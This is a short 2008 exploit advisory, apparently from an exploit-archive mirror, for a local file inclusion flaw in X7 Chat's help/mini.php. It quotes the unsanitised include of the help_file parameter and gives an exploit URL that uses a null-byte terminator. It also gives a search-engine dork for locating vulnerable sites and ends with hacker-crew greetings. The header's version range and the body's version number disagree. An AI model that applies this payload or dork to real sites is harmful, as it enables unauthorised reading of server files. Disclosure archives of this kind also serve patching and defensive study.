[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : X7 Chat <= 2.0.1A1 (mini.php help_file) Local File Inclusion Vulnerability
# Published : 2008-09-27
# Author : NoGe
# Previous Title : RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability
# Next Title : Vbgooglemap Hotspot Edition 1.0.3 Remote SQL Injection Vulnerability


====================================================================


  [o] X7 Chat <= 2.0.1A1 Local File Inclusion Vulnerability

       Software : X7 Chat version 2.0.5.1
       Vendor   : http://x7chat.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com


====================================================================


  [o] Vulnerable file

       help/mini.php

        include("./help/{$_GET['help_file']}");



  [o] Exploit

       http://localhost/[path]/help/mini.php?help_file=[LFI]%00



  [o] Dork

       "powered by x7 chat"


====================================================================


  [o] Greetz

       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ k1tk4t
       skulmatic olibekas ulga Cungkee str0ke

        
====================================================================

# www.Syue.com [2008-09-27]